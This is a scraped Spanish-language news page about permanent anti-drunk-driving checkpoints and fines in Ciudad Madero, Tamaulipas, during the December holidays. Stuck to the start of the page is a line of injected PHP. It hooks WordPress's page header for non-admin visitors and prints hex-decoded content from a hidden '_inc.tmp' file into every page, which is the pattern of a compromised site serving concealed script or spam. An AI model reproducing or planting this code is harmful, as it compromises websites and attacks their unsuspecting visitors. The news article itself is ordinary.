if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Operativo de alcohol permanente durante diciembre en Ciudad Madero – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Operativo de alcohol permanente durante diciembre en Ciudad Madero

Operativo de alcohol permanente durante diciembre en Ciudad Madero

Ciudad Madero Tamaulipas.- Una multa mínima de 7 mil 500 pesos, que puede aumentar, se aplicará a automovilistas que sean sorprendidos en los ahora llamados filtros de prevención de accidentes u operativos de alcoholemia, que se instalan de manera permanente en distintos puntos de Ciudad Madero.

Sandra Patricia Cruz Moreno, directora de transito de Madero, señaló que en un año que lleva al frente de la dirección de tránsito y por instrucciones del alcalde, Adrián Oseguera Kernion, los operativos anti alcohol o ahora llamados filtros de prevención de accidentes, han dado buenos resultados, bajando de manera importante los accidentes por conducir en estado de ebriedad. 

Sandra Cruz Moreno

Indicó Cruz Moreno, que durante el fin de semana y a causa de las lluvias y las bajas temperaturas, no se detuvo a persona alguna manejando en estado de ebriedad.

EXHORTO A DESIGNAR CONDUCTOR QUE NO TOME ALCOHOL

Sandra Patricia Cruz Moreno, titula de transito y vialidad, exhorta los conductores, que durante las fiestas de diciembre, con posadas y festejos de nochebuena, navidad y fin de año, sean prudentes y no conducir bajo los efectos del alcohol.

Se previene un accidente que puede ser mortal, causar daños a terceros o pagar una multa mínima de 7 mil 500 pesos que afectaría la economía familiar.

Los ahora llamados filtros de prevención de accidentes u operativos anti alcohol, serán permanentes en lo que resta el año y las fiestas decembrinas, sentenció Cruz Moreno.

Lic. En Psicología Clínica por la UNE, Diplomado en Sexualidad Humana por la UNAM, LCC – UAT. Inició carrera en medios de comunicación en 1996.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas